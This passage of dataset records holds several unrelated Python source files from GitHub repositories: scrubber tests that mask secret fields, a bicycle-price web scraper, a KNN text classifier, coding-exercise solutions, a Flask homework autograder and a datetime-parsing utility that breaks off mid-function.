data_scrubber._contains_sensitive_data(content)\n assert result is expected\n\n @pytest.mark.parametrize(\n \"content, expected\",\n [\n # ok, json data, matched sensitive key\n (\n '{\"app_code\": \"test\", \"app_secret\": \"xxx\"}',\n '{\"app_code\": \"test\", \"app_secret\": \"***\"}',\n ),\n # ok, urlencoded data, matched sensitive key\n (\n \"app_code=test&app_secret=test\",\n \"app_code=test&app_secret=%2A%2A%2A\",\n ),\n # ok, json data, part matched sensitive key\n (\n '{\"app_code\": \"test\", \"my_password\": \"xxx\"}',\n '{\"app_code\": \"test\", \"my_password\": \"***\"}',\n ),\n ],\n )\n def test_scrub_body(self, content, expected):\n data_scrubber = DataScrubber()\n result = data_scrubber._scrub_body(content)\n assert result == expected\n\n @pytest.mark.parametrize(\n \"content\",\n [\n # error, invalid json data\n '{\"app_code\": \"test\", \"app_secr',\n # error, invalid urlencoded data\n \"a=b&cd\",\n ],\n )\n def test_scrub_body__error(self, content):\n data_scrubber = DataScrubber()\n with pytest.raises(NotScrubbedException):\n data_scrubber._scrub_body(content)\n\n @pytest.mark.parametrize(\n \"data, expected\",\n [\n (\n # ok, matched\n {\n \"app_code\": \"test\",\n \"app_secret\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"app_secret\": \"***\",\n },\n ),\n # ok, part matched\n (\n {\n \"app_code\": \"test\",\n \"my_password\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"my_password\": \"***\",\n },\n ),\n # ok, no sensitive data\n (\n {\n \"app_code\": \"test\",\n \"at\": \"test\",\n },\n {\n \"app_code\": \"test\",\n \"at\": \"test\",\n },\n ),\n # ok, some value is empty\n (\n {\n \"app_code\": \"test\",\n \"at\": \"\",\n },\n {\n \"app_code\": \"test\",\n \"at\": \"\",\n },\n ),\n ],\n )\n def test_scrub_by_keys(self, data, expected):\n data_scrubber = DataScrubber()\n result = data_scrubber._scrub_by_keys(data)\n assert result == expected\n","repo_name":"TencentBlueKing/blueking-apigateway","sub_path":"src/dashboard/apigateway/apigateway/tests/biz/access_log/test_data_scrubber.py","file_name":"test_data_scrubber.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"79"} +{"seq_id":"41104401972","text":"import scrapy\nimport re\n\nclass PriceSpider(scrapy.Spider):\n # name of the spider, used when invoking the spider through command line\n name = \"price\"\n\n # starting point of the spider, use self.parse as callback by default\n start_urls=['https://www.bicyclebluebook.com/SearchBikes.aspx']\n\n # extract links of all makes\n def parse(self, response):\n rawMakeLinks = response.css(\"a::attr(href)\").getall()\n cleanMakeLinks = filter(lambda x: \"BicycleDatabase.aspx\" in x, rawMakeLinks)\n cleanMakeLinks = map(lambda x: 'https://www.bicyclebluebook.com' + x, cleanMakeLinks)\n for makeLink in cleanMakeLinks:\n yield scrapy.Request(url=makeLink, callback=self.parse_models)\n\n # extract links of all models\n def parse_models(self, response):\n rawModelLinks = response.css(\"a::attr(href)\").getall()\n cleanModelLinks = filter(lambda x: \"SearchListing.aspx\" in x, rawModelLinks)\n cleanModelLinks = map(lambda x: 'https://www.bicyclebluebook.com' + x, cleanModelLinks)\n for modelLink in cleanModelLinks:\n yield scrapy.Request(url=modelLink, callback=self.parse_years)\n \n # extract year, make, model, category, and link of all years\n def parse_years(self, response):\n rawContent = response.css(\".values-line\").getall()\n for content in rawContent:\n #make = content.css(\".col-sm-2\").get()\n year = re.search(r'
      (.*?)
      ', content).group(1)\n make = re.search(r'
      (.*?)
      ', content).group(1)\n model = re.search(r'
      (.*?)
      ', content).group(1)\n category = re.search(r'
      (.*?)
      ', content).group(1)\n link = 'https://www.bicyclebluebook.com' + re.search(r'onclick=\"location.href=\\'(.*?)\">', content).group(1)\n yield scrapy.Request(url=link, callback=self.parse_bike, cb_kwargs={'year':year, 'make':make, 'model':model, 'category':category})\n\n # extract bike price evaluation and description\n def parse_bike(self, response, year, make, model, category):\n prices=[]\n for price in response.css(\".col-xs-6::text\").getall():\n if '$' in price:\n clean = price.strip().replace('\\r\\n', '').replace(' ', '').replace('\\'', '')\n prices.append(clean)\n res = {'year':year, 'make':make, 'model':model, 'category':category}\n for i in range(len(prices)):\n if i < len(prices)-1:\n minPrice = prices[i].split('-')[0].replace('$', '')\n maxPrice = prices[i].split('-')[1].replace('$', '')\n if i == 0:\n res[\"excellent\"] = (minPrice, maxPrice)\n elif i == 1:\n res[\"very-good\"] = (minPrice,maxPrice)\n elif i == 2:\n res['good'] = (minPrice, maxPrice)\n elif i == 3:\n res['fair'] = (minPrice, maxPrice)\n else:\n price = prices[i].replace(',', '').replace('$', '')\n res['msrp'] = (price)\n res['img'] = response.css('.col-sm-12 img::attr(src)').get()\n res['raw-description'] = response.css(\".bvg-product-details\").get()\n yield res\n","repo_name":"EthanInSeattle/bikevaluebook","sub_path":"crawler/bike_value_book/bike_value_book/spiders/price_spider.py","file_name":"price_spider.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11997178886","text":"import pickle\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\n\n# load the data\ndf = pd.read_csv(\"data/data.csv\")\nX = df['doc']\ny = df['class']\n\n# split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state=21)\n\n# model pipeline\npipe_knn = Pipeline([['tfidf', TfidfVectorizer()], ['knn', KNeighborsClassifier()]])\n\n# use grid search to find the optimal number of neighbours\nparam_range = [2,3,4,5,6,7]\nparams = {'knn__n_neighbors': param_range}\ngrid_knn = GridSearchCV(estimator = pipe_knn, \n param_grid = params,\n cv=10,\n scoring='f1')\ngrid_knn.fit(X_train, y_train)\n\n# model with optimal parameters\nmodel = grid_knn.best_estimator_\n\n# check model's performance of the test set\ny_pred = model.predict(X_test)\nclf_report = classification_report(y_test, y_pred)\nprint(clf_report)\nwith open(\"model_performance_report.txt\", \"w\") as text_file:\n text_file.write(clf_report)\n\n# save the model for later use\nwith open('knn_model.pkl', 'wb') as file:\n pickle.dump(model, file)\n\n","repo_name":"piyushrj/joke-vs-insult","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"74411703296","text":"class Solution3:\n def isPalindrome(self, s: str) -> bool:\n s = s.lower()\n s = re.sub ('[^a-z0-9]','',s)\n \n return s == s[::-1]\n \n \n \n\nclass Solution1:\n def isPalindrome(self, s: str) -> bool:\n \n #1. 데이터 전처리 -> ['a','m', .. '[a]']\n s = [] \n for char in s:\n if char.isalnum():\n strs.append(char.lower())\n \n #2. 팰린드롬 여부 판별\n while len(strs) > 1: # 예외처리\n if strs.pop(0) != strs.pop():\n return False\n # 모두 통과했다면 True 리턴\n \n \n\n \nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n \n # 자료형 데크로 선언\n strs:Deque = collections.deque()\n \n for char in s: \n if char.isalnum():\n strs.append(char.lower())\n \n while len(strs) > 1: \n if strs.popleft() != strs.pop():\n return False\n \n return True\n \n \n","repo_name":"juyeong-repo/Algorithm","sub_path":"0125-valid-palindrome/0125-valid-palindrome.py","file_name":"0125-valid-palindrome.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74082524094","text":"import json\n\ndef main():\n print(\"Crawling through project configs\")\n with open(\"GNS3/project.gns3\", \"r\") as file:\n project = json.loads(file.read())\n name = project[\"name\"]\n print(f\"Project: {name}\")\n nodes = {}\n for node in project[\"topology\"][\"nodes\"]:\n name = node[\"name\"]\n id = node[\"node_id\"]\n print(f\"{name}: {id}\")\n nodes[id] = name\n for link in project[\"topology\"][\"links\"]:\n node0 = link[\"nodes\"][0][\"node_id\"]\n node1 = link[\"nodes\"][1][\"node_id\"]\n print(f\"{nodes[node0]} -- {nodes[node1]}\")\n mappings = {}\n for (k, v) in nodes.items():\n pass\n\n\n with open(\"mappings.json\", \"w\") as file:\n json.dump({}, file)\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Gui-Yom/nas","sub_path":"crawlproject.py","file_name":"crawlproject.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1368270657","text":"from flask import Flask, request\n\nfrom src.exceptions import Container\nfrom src.homeworks.homework1 import homework1\nfrom src.homeworks.homework2 import homework2\nfrom src.homeworks.homework3 import homework3\nfrom src.homeworks.homework4 import homework4\nfrom src.messages import error\n\navailable_homeworks = {\n '1': homework1,\n '2': homework2,\n '3': homework3,\n '4': homework4\n}\n\n\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('configs.cfg')\n\n\ndef request_checking(request, token_level, homework_number):\n if not request.is_json:\n raise Container(error('Sent format is not a json', 'json'))\n data = request.get_json()\n if 'token' not in data:\n raise Container(error('The token is not included', 'token_missing'))\n if data['token'] != app.config[token_level]:\n raise Container(\n error(\n 'The token is not correct/is invalid',\n 'token_wrong'))\n if homework_number not in available_homeworks:\n raise Container(\n error(\n f'There is no homework {homework_number}',\n 'no_homework'))\n\n return data\n\n\n@app.route('/ping')\ndef ping():\n # return {'message': 'Not yet ready.'}\n return {'status': 'OK'}\n\n\n@app.route('/force_reload/', methods=['POST'])\ndef reload_tests(homework_number):\n try:\n request_checking(\n request,\n token_level='ADMIN_TOKEN',\n homework_number=homework_number)\n except Container as e:\n return e.data\n\n available_homeworks[homework_number].reload_tests()\n\n return {'status': 'OK'}\n\n\n@app.route('/api/autocheck//',\n methods=['POST'])\ndef autocheck(homework_number, question_number):\n try:\n data = request_checking(\n request,\n token_level='TOKEN',\n homework_number=homework_number)\n except Container as e:\n return e.data\n\n return available_homeworks[homework_number].check(\n question_number=question_number,\n data=data)\n\n\n@app.route('/api/tests//',\n methods=['POST'])\ndef process(homework_number, question_number):\n try:\n data = request_checking(\n request,\n token_level='TOKEN',\n homework_number=homework_number)\n except Container as e:\n return e.data\n\n return available_homeworks[homework_number].get_test(\n question_number=question_number,\n data=data)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"dccuchile/CC6204","sub_path":"autocorrect-server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"79"} +{"seq_id":"7012229604","text":"from PyQt5 import QtGui, QtCore, QtWidgets\n\n\n# Add new item to QTree from list of strings\ndef qtreeAddItem(self, qtree, vallist):\n item = QtWidgets.QTreeWidgetItem(qtree)\n qtree.addTopLevelItem(item)\n\n for idx, val in enumerate(vallist):\n item.setText(idx, val)","repo_name":"HelmchenLabSoftware/HHNE","sub_path":"src/qtree_helper.py","file_name":"qtree_helper.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24420099227","text":"def compareTriplets(a, b):\n a_points = 0\n b_points = 0\n\n for (a_s, b_s) in zip(a, b):\n if a_s > b_s:\n a_points += 1\n elif b_s > a_s:\n b_points += 1\n \n return [a_points, b_points]\n\n\nif __name__ == '__main__':\n a = [17, 28, 30]\n b = [99, 16, 8]\n\n print(compareTriplets(a, b))","repo_name":"xiayongk/HackerRank","sub_path":"Algorithms/Warmup/compare_the_triplets.py","file_name":"compare_the_triplets.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36519980064","text":"from __future__ import annotations\n\nimport re\nimport datetime\nfrom itertools import permutations\n\n\nclass CustomDateTime:\n SUPPORTED_FORMAT = {\n\n }\n SUPPORTED_LANG = (\"fr\", \"en\")\n MONTH = {\n 1: {\"value\": [\"janvier\", \"january\", \"janv\", \"jan\", \"ja\"], \"abr\": (\"janv\", \"jan\")},\n 2: {\"value\": [\"février\", \"february\", \"févr\", \"fevr\", \"fév\", \"feb\", \"fevrier\", \"fev\", \"fe\"],\n \"abr\": (\"févr\", \"feb\")},\n 3: {\"value\": [\"mars\", \"march\", \"mar\"], \"abr\": (\"mars\", \"march\")},\n 4: {\"value\": [\"avril\", \"april\", \"avr\", \"apr\", \"ap\", \"av\"], \"abr\": (\"avr\", \"apr\")},\n 5: {\"value\": [\"mai\", \"may\"], \"abr\": (\"mai\", \"may\")},\n 6: {\"value\": [\"juin\", \"june\", \"jun\"], \"abr\": (\"juin\", \"june\")},\n 7: {\"value\": [\"juillet\", \"july\", \"juil\", \"jul\"], \"abr\": (\"juil\", \"july\")},\n 8: {\"value\": [\"août\", \"august\", \"aout\", \"aug\", \"ao\"], \"abr\": (\"août\", \"aug\")},\n 9: {\"value\": [\"septembre\", \"september\", \"sept\", \"sep\"], \"abr\": (\"sept\", \"sept\")},\n 10: {\"value\": [\"octobre\", \"october\", \"oct\"], \"abr\": (\"oct\", \"oct\")},\n 11: {\"value\": [\"novembre\", \"november\", \"nov\", \"no\"], \"abr\": (\"nov\", \"nov\")},\n 12: {\"value\": [\"décembre\", \"december\", \"decembre\", \"dec\", \"déc\", \"de\"], \"abr\": (\"déc\", \"dec\")}\n }\n WEEKDAYS = [\"Lundi\", \"Mardi\", \"Mercredi\", \"Jeudi\", \"Vendredi\", \"Samedi\", \"Dimanche\"]\n WEEKDAYS_ABR = [\"Lun\", \"Mar\", \"Mer\", \"Jeu\", \"Ven\", \"Sam\", \"Dim\"]\n WEEKDAYS_EN = [\"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\", \"Sunday\"]\n WEEKDAYS_EN_ABR = [\"Mon\", \"Tues\", \"Wed\", \"Thur\", \"Fri\", \"Sat\", \"Sun\"]\n\n DEFAULT_LANG = \"fr\"\n\n def __init__(self, date_value: str | datetime.datetime | datetime.date = \"now\",\n format_=None, **kwargs):\n self._source = self._parse(date_value, format_=format_, **kwargs)\n\n def __sub__(self, other):\n if isinstance(other, int):\n return CustomDateTime.from_calculation(self._source, minus_or_add=\"-\" + str(other) + \"day\")\n return (self.date - CustomDateTime(other).date).days\n\n def __add__(self, other):\n if isinstance(other, int):\n return CustomDateTime.from_calculation(self._source, minus_or_add=str(other) + \"day\")\n elif isinstance(other, str):\n return CustomDateTime.from_calculation(self._source, minus_or_add=other)\n return self.date + other\n\n __radd__ = __add__\n\n def __call__(self, *args, **kwargs):\n return self._source\n\n def __getattr__(self, item):\n return getattr(self._source, item)\n\n def __str__(self):\n return str(self._source)\n\n def __repr__(self):\n return repr(self._source)\n\n # OK\n def time_is(self, value) -> bool:\n try:\n res = re.search(r'(\\d{1,2})(?:\\s*h?\\s*)?(?::\\s*(\\d{1,2})'\n r'(?:\\s*m?\\s*)?)?(?::\\s*(\\d{1,2})(?:\\s*s?\\s*)?(?:\\.(\\d+))?)?',\n value,\n flags=re.I | re.S).groups()\n is_equal = False\n this = self._source.time()\n for i, t in enumerate(\"hour,minutes,second,microsecond\".split(\",\")):\n if res[i] is None:\n return is_equal\n assert getattr(this, t) == int(res[i])\n is_equal = True\n\n except (AttributeError, AssertionError):\n return False\n\n @property\n def date(self):\n return self._source.date()\n\n @property\n def is_datetime(self):\n return (self._source.minute > 0 or self._source.second > 0 or\n self._source.hour > 0 or self._source.microsecond > 0)\n\n @staticmethod\n def _get_weekday(date_value: datetime.date | datetime.date, abr=False):\n return (getattr(CustomDateTime, \"WEEKDAYS\" + (\n \"_EN\" if CustomDateTime.DEFAULT_LANG.lower() == \"en\" else \"\"\n ) + (\"_ABR\" if abr else \"\"))[date_value.weekday()])\n\n @staticmethod\n def _get_month(date_value: datetime.date | datetime.date, abr=False):\n return CustomDateTime.MONTH[date_value.month][\"abr\" if abr else \"value\"][\n (1 if CustomDateTime.DEFAULT_LANG.lower() == \"en\" else 0)]\n\n @property\n def get_french_weekday(self):\n return self.WEEKDAYS[self._source.weekday()]\n\n # Ok\n @staticmethod\n def range_date(inf: datetime.date | CustomDateTime | str, sup: datetime.date | CustomDateTime | str | int = None,\n step=1,\n freq=\"day\"):\n assert isinstance(step, int) and step != 0, \"Bad value of step param. %s given\" % (step,)\n freq = freq.lower().strip()\n freq = freq[:-1] if len(freq) > 1 and freq[-1] == \"s\" else freq\n freq = (\n {\n \"d\": \"day\", \"j\": \"day\", \"day\": \"day\", \"jour\": \"day\",\n \"minute\": \"minute\", \"min\": \"minute\",\n \"sec\": \"second\", \"s\": \"second\", \"second\": \"second\",\n \"seconde\": \"second\",\n \"week\": \"week\", \"semaine\": \"week\", \"sem\": \"week\",\n \"w\": \"week\",\n \"h\": \"hour\", \"hour\": \"hour\", \"heure\": \"hour\",\n \"millisecond\": \"millisecond\", \"mil\": \"millisecond\",\n \"milliseconde\": \"millisecond\",\n \"month\": \"month\", \"moi\": \"month\", \"m\": \"month\",\n \"y\": \"year\", \"annee\": \"year\", \"année\": \"year\", \"an\": \"year\",\n \"year\": \"year\", \"a\": \"year\"\n }.get(freq, \"day\") + \"s\")\n\n if sup is None:\n now = (datetime.datetime.now() if\n freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]\n else datetime.date.today())\n inf = CustomDateTime(inf)\n inf = (inf() if\n freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]\n else inf.date)\n if inf < now:\n sup = \"now\"\n else:\n sup = inf\n inf = \"now\"\n\n inf = CustomDateTime(inf)()\n if isinstance(sup, int):\n sup = inf + datetime.timedelta(days=sup)\n if sup < inf:\n step = -1 if not step else -step\n else:\n sup = CustomDateTime(sup)()\n\n if freq in [\"months\", \"years\"]:\n sup = sup.date()\n inf = inf.date()\n temp = inf\n sign = 1 if sup > inf and step > 0 else -1\n while True:\n if sign == 1 and temp > sup:\n return\n elif sign == -1 and temp < sup:\n return\n yield temp\n temp = CustomDateTime.from_calculation(temp, minus_or_add=str(sign * abs(step)) + freq).date\n else:\n if freq == \"minutes\":\n d = int((sup - inf).total_seconds() / 60)\n elif freq == \"hours\":\n d = int((sup - inf).total_seconds() / (60 * 60))\n elif freq == \"weeks\":\n d = int((sup - inf).days / 7)\n else:\n if freq in [\"hours\", \"minutes\", \"seconds\", \"milliseconds\"]:\n pass\n else:\n # day\n sup = sup.date()\n inf = inf.date()\n d = getattr(sup - inf, freq)\n sign = 1 if d > 0 and step > 0 else -1\n\n d = int(abs(d) + 1)\n for i in range(0, d, abs(step) or 1):\n yield inf + datetime.timedelta(**{freq: i * sign})\n\n @staticmethod\n def _parse_format(d_format, current_time=None):\n time_ = False\n d_format = d_format.replace(\"%\", \"\")\n d_format = re.sub(\"yyyy\", \"%Y\", d_format, flags=re.I)\n d_format = re.sub(\"yy\", \"%y\", d_format, flags=re.I)\n d_format = re.sub(\"aaaa\", \"%Y\", d_format, flags=re.I)\n d_format = re.sub(\"aa\", \"%y\", d_format, flags=re.I)\n\n d_format = re.sub(\"mm\", \"%m\", d_format, flags=re.I)\n d_format = re.sub(\"dd\", \"%d\", d_format, flags=re.I)\n d_format = re.sub(\"jj\", \"%d\", d_format, flags=re.I)\n d_format = re.sub(\"yyyy\", \"%Y\", d_format, flags=re.I)\n\n # hour\n d_format = re.sub(\"hh\", \"%H\", d_format, flags=re.I)\n d_format = re.sub(\"ss\", \"%S\", d_format, flags=re.I)\n if current_time is not None:\n d_format = re.sub(\"day\", CustomDateTime._get_weekday(current_time), d_format, flags=re.I)\n d_format = re.sub(r\"d\\.\", CustomDateTime._get_weekday(current_time, abr=True), d_format, flags=re.I)\n d_format = re.sub(\"jour\", CustomDateTime._get_weekday(current_time), d_format, flags=re.I)\n d_format = re.sub(r\"j\\.\", CustomDateTime._get_weekday(current_time, abr=True), d_format, flags=re.I)\n d_format = re.sub(\"month\", CustomDateTime._get_month(current_time), d_format, flags=re.I)\n d_format = re.sub(\"mois\", CustomDateTime._get_month(current_time), d_format, flags=re.I)\n d_format = re.sub(r\"m\\.\", CustomDateTime._get_month(current_time, abr=True), d_format, flags=re.I)\n\n last_car_is_percent = False\n final_format = \"\"\n\n # one\n for car in re.split(\"(? datetime.datetime:\n if isinstance(date_value, CustomDateTime):\n return date_value._source\n if isinstance(date_value, (datetime.datetime, datetime.date)):\n return datetime.datetime.fromisoformat(date_value.isoformat())\n if isinstance(format_, str):\n format_ = [format_]\n if isinstance(format_, (list, tuple)):\n for ff in format_:\n try:\n if \"%\" not in ff:\n ff, _ = CustomDateTime._parse_format(ff)\n return datetime.datetime.strptime(str(date_value), ff)\n except (ValueError, Exception):\n pass\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Given arg (%s) doesn't match any format given: %s\" % (date_value, format_))\n now = datetime.datetime.now()\n\n args = {k: kwargs.get(k, getattr(now, k))\n for k in [\"year\", \"month\", \"day\", \"hour\", \"minute\", \"second\",\n \"microsecond\"]}\n now = datetime.datetime(**args)\n\n if date_value == \"now\" or date_value is None:\n date_value = now\n elif isinstance(date_value, str):\n\n if len(date_value) < 6 or re.search(r\"\\d{9,}\", date_value) or not re.search(r'\\d{2}', date_value):\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Bad value given for argument date_value: \" + date_value)\n\n d_format = kwargs.get(\"d_format\")\n equivalent_str_parse_time = {\n \"%Y\": r\"(\\d{4})\", \"%y\": r\"(\\d{2})\",\n \"%m\": r\"(\\d{2})\",\n \"%d\": r\"(\\d{1,2})\"\n }\n year, month, day = [None] * 3\n dhour, dminute, dsecond, dmicro = [0] * 4\n if d_format is not None:\n if isinstance(d_format, str):\n d_format = [d_format]\n got = False\n for ff in d_format:\n orign_ff = ff\n if \"%\" not in ff:\n ff, time_ = CustomDateTime._parse_format(ff)\n temp = ff\n for k, v in equivalent_str_parse_time.items():\n temp = temp.replace(k, v)\n for car in \"AaBb\":\n temp = temp.replace(\"%\" + car, r\"(\\w+)\")\n for car in \"wWjU\":\n temp = temp.replace(\"%\" + car, r\"(\\d+)\")\n res = re.search(\"(\" + temp + \")\", date_value)\n if res:\n if \"%\" in orign_ff:\n try:\n temp = datetime.datetime.strptime(res.groups()[0], orign_ff)\n year, month, day = temp.year, temp.month, temp.day\n got = True\n break\n except (ValueError, Exception):\n pass\n else:\n args = {k: v for k, v in zip(re.findall(r\"%([Yymd])\", ff), res.groups()[1:])}\n if \"y\" in args and \"Y\" not in args:\n # make some transformation here\n args[\"Y\"] = args[\"y\"]\n year, month, day = args.get(\"Y\", str(now.year)), args.get(\"m\", \"01\"), args.get(\"d\", \"01\")\n if len(year) == 2:\n if \"20\" + year <= str(datetime.datetime.now().year):\n year = \"20\" + year\n else:\n year = \"19\" + year\n try:\n temp = datetime.date(int(year), int(month), int(day))\n year, month, day = temp.year, temp.month, temp.day\n got = True\n break\n except (ValueError, Exception):\n pass\n\n if not got:\n if ignore_errors:\n return CustomDateTime(default)()\n raise ValueError(\"Bad value given for argument date_value: %s for formats: %s\" %\n (date_value, d_format))\n if year is None:\n\n date_value = date_value.strip()\n reg = (r'^(\\d{4})[_/-]?(\\d{1,2})[_/-]?(\\d{1,2})(?:[A-Z ]?'\n r'(\\d{1,2})[:_](\\d{1,2})(?:[:_](\\d{1,2})(?:\\.(\\d+))?)?[A-Z]?)?$'\n )\n res = re.search(reg, date_value)\n\n if res:\n got = True\n year, month, day, hour, minute, second, micro = res.groups()\n if int(month) not in range(1, 13):\n got = False\n elif int(year) < 1900:\n got = False\n elif int(day) > 31:\n got = False\n if got:\n try:\n return datetime.datetime(year=int(year),\n month=int(month),\n day=int(day),\n hour=int(hour or 0),\n minute=int(minute or 0),\n second=int(second or 0),\n microsecond=int(micro or 0) * 1000\n )\n except ValueError:\n pass\n # try to extract the date from string\n reg_1 = r'\\s(\\d{1,2})[_/-]?(\\d{1,2})[_/-]?(\\d{4})\\s'\n reg_0 = r'\\s(\\d{4})[_/-]?(\\d{1,2})[_/-]?(\\d{1,2})\\s'\n dyear, dmonth, dday, dhour, dminute, dsecond, dmicro = (\n now.year, 1, 1, 0, 0, 0, 0)\n got = False\n\n year, month, day = dyear, dmonth, dday\n if re.search(reg_1, f\" {date_value} \"):\n year, month, day = re.search(reg_1,\n f\" {date_value} \").groups()[::-1]\n if int(month) in range(1, 13) and int(day) <= 31:\n got = True\n if not got and re.search(reg_0, f\" {date_value} \"):\n year, month, day = re.search(reg_0, f\" {date_value} \").groups()\n if int(month) in range(1, 13) and int(day) <= 31:\n got = True\n if not got:\n month_ref = {}\n v = \"\"\n for key, value in CustomDateTime.MONTH.items():\n value = value[\"value\"]\n for s in value:\n v += s + \"|\"\n month_ref[s] = key\n v = v[:-1]\n reg = r\"\\s(?:(\\d{1,2})[\\s-]+)?(%s)[\\s-]+(?:(\\d{2}|\\d{4})\\s)?\" % v\n if re.search(reg, f\" {date_value} \", flags=re.I):\n day, month, year = re.search(reg,\n f\" {date_value} \",\n flags=re.I).groups()\n year = year or str(now.year)\n if len(year) == 2:\n if \"20\" + year <= str(datetime.datetime.now().year):\n year = \"20\" + year\n else:\n year = \"19\" + year\n month = month_ref[month.lower()]\n got = True\n try:\n assert got, f\"Date Parsing fail: format not supported ->\" \\\n f\" {repr(date_value)}\"\n except AssertionError:\n if ignore_errors:\n default = CustomDateTime._parse(default)\n day, month, year = default.day, default.month, default.year\n else:\n raise ValueError(f\"Date Parsing fail: format not supported ->\"\n f\" {repr(date_value)}\")\n # try to extract hour\n reg_hour = r\"\\s(\\d{1,2})[:_](\\d{1,2})(?:[:_](\\d{1,2})(?:\\.(\\d+))?)?(?:\\s+(am|pm))?\\s\"\n hour, minute, second, micro = 0, 0, 0, 0\n reg_hour = re.search(reg_hour, f\" {date_value} \", flags=re.I)\n if reg_hour:\n hour, minute, second, micro, am_pm = reg_hour.groups()\n hour = int(hour)\n am_pm = str(am_pm).strip().lower()\n if am_pm == \"am\" and hour >= 12:\n hour = hour - 12\n elif am_pm == \"pm\" and hour < 12:\n hour = hour + 12\n try:\n date_value = datetime.datetime(year=int(year),\n month=int(month),\n day=int(day),\n hour=int(hour or dhour),\n minute=int(minute or dminute),\n second=int(second or dsecond),\n microsecond=int(micro or\n dmicro) * 1000\n )\n except ValueError as ex:\n ex.args = [\"Got bad value of date_value: %s. \"\n \"After parsing got year=%s, month=%s day=%s\" % (date_value, year, month, day)]\n raise ex\n return date_value\n\n # Ok\n def to_string(self, d_format=None, sep=None, microsecond=False, force_time=False,\n t=True, intelligent=False, approximative=True):\n if not force_time and t:\n t = (self._source.hour or self._source.minute\n or self._source.second or self._source.microsecond)\n return self.datetime_as_string(self._source, sep=sep,\n microsecond=microsecond, time_=t,\n d_format=d_format, intelligent=intelligent,\n approximative=approximative)\n\n def get_month(self):\n last_month = CustomDateTime(str(self.to_string(\"y-m\") + \"-01\")) - 1\n return type(\"CustomMonth\", (), {\"end\": lambda: last_month, \"nb_day\": int(last_month.to_string(\"dd\"))})\n\n # Ok\n @staticmethod\n def datetime_as_string(\n date_time: str | datetime.datetime | datetime.date = \"now\",\n sep=None, microsecond=False,\n time_=True, d_format=None,\n intelligent=False, approximative=True):\n \"\"\"\n Use to get datetime formatting to str\n Args:\n date_time: datetime value\n sep: str\n microsecond: bool, consider microsecond?\n time_: show time\n d_format: str\n intelligent: bool\n approximative: bool\n\n Returns:\n str, the datetime str formatted\n\n \"\"\"\n\n current_time = CustomDateTime._parse(date_time)\n now = CustomDateTime()\n _months = [i for i in CustomDateTime.range_date(current_time.date(), now.date, freq=\"m\")]\n if now() >= current_time:\n _months = _months[1:]\n if intelligent and len(_months) <= 12:\n if CustomDateTime.DEFAULT_LANG == \"fr\":\n t = \" à \" if time_ else \"\"\n _msg_start = \"Il y a \" if now() >= current_time else \"Dans \"\n _msg_end = \"\"\n hier_text = \"Hier\" + t if now() >= current_time else \"Demain\" + t\n print(hier_text, current_time, now(), now() >= current_time)\n else:\n _msg_start = \"\" if now() >= current_time else \"In \"\n _msg_end = \"ago\" if now() >= current_time else \"\"\n hier_text = \"Yesterday \" if now() >= current_time else \"Tomorrow \"\n\n if now.date == current_time.date():\n if time_:\n dts = abs(int((now() - current_time).total_seconds()))\n _h = int(dts // (60 * 60))\n if _h > 0:\n return _msg_start + str(_h) + \" h\" + \" \" + _msg_end\n _m = int(dts // 60)\n if _m > 0:\n return _msg_start + str(_m) + \"m \" + _msg_end\n return _msg_start + str(dts) + \"s \" + _msg_end\n else:\n return \"Ce jour\" if CustomDateTime.DEFAULT_LANG == \"fr\" else \"This day\"\n elif (now.date == CustomDateTime.from_calculation(current_time, \"+1 day\").date or\n now.date == CustomDateTime.from_calculation(current_time, \"-1 day\").date):\n return hier_text + \\\n current_time.strftime(\"%H:%M\" if time_ else \"\")\n elif not len(_months) and CustomDateTime.DEFAULT_LANG == \"fr\":\n return f\"Le {current_time.date().day:0>2}\" + current_time.strftime(\" à %H:%M\" if time_ else \"\")\n elif abs((now.date - current_time.date()).days) < 30:\n s = \"s\" if (now.date - current_time.date()).days > 1 else \"\"\n _jour = (\" jour%s\" % s) if CustomDateTime.DEFAULT_LANG == \"fr\" else (\" day%s \" % s)\n return _msg_start + str(abs((now.date - current_time.date()).days)) + _jour + _msg_end\n elif approximative:\n s = \"s\" if len(_months) > 1 else \"\"\n _mois = (\" mois\" if CustomDateTime.DEFAULT_LANG == \"fr\" else \" month%s \" % s)\n return _msg_start + str(len(_months)) + _mois + _msg_end\n else:\n return CustomDateTime.datetime_as_string(current_time, d_format=\"day month\") + \\\n current_time.strftime(\"%H:%M\" if 